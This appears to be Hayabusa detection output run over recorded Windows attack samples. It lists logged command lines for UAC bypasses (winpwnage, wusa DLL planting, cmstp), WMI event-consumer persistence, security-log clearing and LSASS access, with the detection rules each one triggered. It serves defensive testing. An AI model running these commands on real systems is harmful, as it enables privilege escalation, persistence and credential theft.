+2019-05-10 22:49:39.930 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 3608 | PGUID: 365ABB72-8173-5CD5-0000-00102FCD2300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:40.164 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32 /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 2676 | PGUID: 365ABB72-8174-5CD5-0000-0010ABE62300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:45.133 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x14241 | PID: 1052 | PGUID: 365ABB72-8179-5CD5-0000-00102CFF2300",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-10 22:49:45.378 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cliconfg.exe"" | Process: C:\Windows\System32\cliconfg.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 11 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x141f8 | PID: 880 | PGUID: 365ABB72-8179-5CD5-0000-001083182400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_11_1_7_uacbypass_cliconfg.evtx
+2019-05-11 18:50:08.248 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x136c5 | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:08.491 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 1136 | PGUID: 365ABB72-9AD0-5CD6-0000-001077FC1600,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:08.491 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:13.494 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:13.509 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3716 | PGUID: 365ABB72-9AD5-5CD6-0000-0010C4131700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:18.404 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 2780 | PGUID: 365ABB72-9ADA-5CD6-0000-001012231700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:18.654 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\ehome /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 3448 | PGUID: 365ABB72-9ADA-5CD6-0000-0010603C1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:26.779 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x136c5 | PID: 2936 | PGUID: 365ABB72-9AE2-5CD6-0000-00106D631700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:27.018 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\ehome\mcx2prov.exe"" | Process: C:\Windows\ehome\Mcx2Prov.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 12 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1369b | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-11 18:50:27.030 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\ehome\CRYPTBASE.dll | Process: C:\Windows\ehome\Mcx2Prov.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2688 | PGUID: 365ABB72-9AE2-5CD6-0000-0010337C1700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_mcx2prov_uacbypass.evtx
+2019-05-12 01:46:10.125 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:10.344 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 3812 | PGUID: 365ABB72-FC52-5CD6-0000-0010357F1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:10.344 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:15.500 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3884 | PGUID: 365ABB72-FC57-5CD6-0000-00101FAF1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:15.547 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 3884 | PGUID: 365ABB72-FC57-5CD6-0000-00101FAF1200,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:20.531 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3756 | PGUID: 365ABB72-FC5C-5CD6-0000-001045DB1200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:20.828 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\migwiz /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 13 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 1256 | PGUID: 365ABB72-FC5C-5CD6-0000-0010E9F61200",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:46:26.203 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\migwiz\CRYPTBASE.dll | Process: C:\Windows\System32\migwiz\migwiz.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 3240 | PGUID: 365ABB72-FC61-5CD6-0000-0010141A1300 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_migwiz.evtx
+2019-05-12 01:54:02.071 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:02.305 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\CRYPTBASE.dll | Process: c:\python27\python.exe | PID: 2028 | PGUID: 365ABB72-FE2A-5CD6-0000-00107E091700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:02.305 +09:00,IEWIN7,11,medium,,Rename Common File to DLL File,,rules/sigma/etw/file_rename/file_rename_win_not_dll_to_dll.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:07.508 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\makecab.exe"" c:\users\ieuser\appdata\local\temp\CRYPTBASE.dll c:\users\ieuser\appdata\local\temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:07.524 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\suspicious.cab | Process: C:\Windows\System32\makecab.exe | PID: 2956 | PGUID: 365ABB72-FE2F-5CD6-0000-001019201700,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:12.493 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x13765 | PID: 3688 | PGUID: 365ABB72-FE34-5CD6-0000-0010EB2E1700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:12.821 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wusa.exe"" c:\users\ieuser\appdata\local\temp\suspicious.cab /extract:C:\Windows\system32\sysprep /quiet | Process: C:\Windows\System32\wusa.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 14 -p c:\Users\IEUser\Desktop\hellox86.dll | LID: 0x1371b | PID: 4000 | PGUID: 365ABB72-FE34-5CD6-0000-0010B8481700",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 01:54:18.069 +09:00,IEWIN7,7,low,,Image Loaded_Sysmon Alert,"Possible UAC Bypass - mcx2prov DLL | Image: C:\Windows\System32\sysprep\CRYPTBASE.dll | Process: C:\Windows\System32\sysprep\sysprep.exe | Company: ? | Signed: false | Signature: Unavailable | PID: 2572 | PGUID: 365ABB72-FE39-5CD6-0000-001012701700 | Hash: SHA1=AA3BF7118AE8138859FC0EE9202684C6DA22C176,MD5=3F090AA1CAE8B179F93B2064B8609AE2,SHA256=AC1DD32C41F6002BDF2EB564653FF23E069594CE55F9E22093355084EE28A6FD,IMPHASH=10D8CBCC4D9E244D697F1C09224856DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_7_11_sysprep_uacbypass.evtx
+2019-05-12 02:10:06.342 +09:00,IEWIN7,1102,high,Evas,Security Log Cleared,User: IEUser,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
+2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,info,,Logon Type 9 - NewCredentials,User: IEUser | Computer:  | IP Addr: ::1 | LID: 0x1bbdce | (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-9-NewInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
+2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,medium,LatMov,Pass the Hash Activity 2,,rules/sigma/builtin/security/win_pass_the_hash_2.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
+2019-05-12 02:10:10.889 +09:00,IEWIN7,4624,high,LatMov,Successful Overpass the Hash Attempt,,rules/sigma/builtin/security/win_overpass_the_hash.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/security_4624_4673_token_manip.evtx
+2019-05-12 02:28:17.176 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x13765 | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:17.363 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Temp\tmp.ini | Process: c:\python27\python.exe | PID: 2460 | PGUID: 365ABB72-0631-5CD7-0000-0010C5862100,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:19.567 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmstp.exe"" /au c:\users\ieuser\appdata\local\temp\tmp.ini | Process: C:\Windows\System32\cmstp.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u uac -i 17 -p c:\windows\System32\cmd.exe | LID: 0x13765 | PID: 3840 | PGUID: 365ABB72-0633-5CD7-0000-0010C6A02100",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:19.567 +09:00,IEWIN7,1,high,PrivEsc | Evas,Bypass UAC via CMSTP,,rules/sigma/process_creation/proc_creation_win_uac_cmstp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:22.598 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} | LID: 0x1371b | PID: 544 | PGUID: 365ABB72-0636-5CD7-0000-0010A6C72100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:22.598 +09:00,IEWIN7,13,high,Evas | Exec,CMSTP Execution Registry Event,,rules/sigma/registry_event/sysmon_cmstp_execution_by_registry.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:28:22.598 +09:00,IEWIN7,1,high,Exec | Evas | PrivEsc,CMSTP UAC Bypass via COM Object Access,,rules/sigma/process_creation/proc_creation_win_cmstp_com_object_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_1_13_11_cmstp_ini_uacbypass.evtx
+2019-05-12 02:57:49.903 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 3140 | PGUID: 365ABB72-0D1D-5CD7-0000-001020EF1500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:22.809 +09:00,IEWIN7,1,info,,Process Created,"Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | Process: C:\Python27\python.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x14591 | PID: 1832 | PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:23.215 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH CommandLineEventConsumer CREATE Name=""BotConsumer23"", ExecutablePath=""c:\Windows\System32\cmd.exe"", CommandLineTemplate=""c:\Windows\System32\cmd.exe"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3184 | PGUID: 365ABB72-0D3F-5CD7-0000-0010DB251600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:23.340 +09:00,IEWIN7,20,info,,WMI Event Consumer Activity,"Created | Type: Command Line | Name: ""BotConsumer23"" | Dst: ""c:\\Windows\\System32\\cmd.exe"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/20_WmiEventConsumerActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:23.418 +09:00,IEWIN7,21,info,,WMI Event Consumer To Filter Activity,"Created | Consumer: ""CommandLineEventConsumer.Name=\""BotConsumer23\"""" | Filter: ""__EventFilter.Name=\""BotFilter82\""""",rules/hayabusa/sysmon/events/21_WmiEventConsumerToFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:23.450 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __FilterToConsumerBinding CREATE Filter='__EventFilter.Name=""BotFilter82""', Consumer='CommandLineEventConsumer.Name=""BotConsumer23""' | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 3196 | PGUID: 365ABB72-0D3F-5CD7-0000-00108B381600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:23.590 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\wbem\WMIC.exe"" /namespace:""\\root\subscription"" PATH __EventFilter CREATE Name=""BotFilter82"", EventNameSpace=""root\cimv2"", QueryLanguage=""WQL"", Query=""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: IEWIN7\IEUser | Parent Cmd: python winpwnage.py -u elevate -i 5 -p c:\Windows\System32\cmd.exe | LID: 0x14591 | PID: 1616 | PGUID: 365ABB72-0D3F-5CD7-0000-001089471600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:39.746 +09:00,IEWIN7,19,info,,WMI Event Filter Activity,"Created | Namespace: ""root\\cimv2"" | Name: ""BotFilter82"" | Query: ""SELECT * FROM __InstanceModificationEvent WITHIN 10 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"" | User: IEWIN7\IEUser",rules/hayabusa/sysmon/events/19_WmiEventFilterActivity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:50.090 +09:00,IEWIN7,1,info,,Process Created,Cmd: c:\Windows\System32\cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -Embedding | LID: 0x3e7 | PID: 2544 | PGUID: 365ABB72-0D5A-5CD7-0000-001069031700,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.762 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 444 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010F4570000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.762 +09:00,IEWIN7,10,low,,Process Access,Src Process: c:\python27\python.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 1832 | Src PGUID: 365ABB72-0D3E-5CD7-0000-0010680E1600 | Tgt PID: 492 | Tgt PGUID: 365ABB72-8693-5CD7-0000-0010765E0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
+2019-05-12 02:58:54.762 +09:00,IEWIN7,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/sysmon_20_21_1_CommandLineEventConsumer.evtx
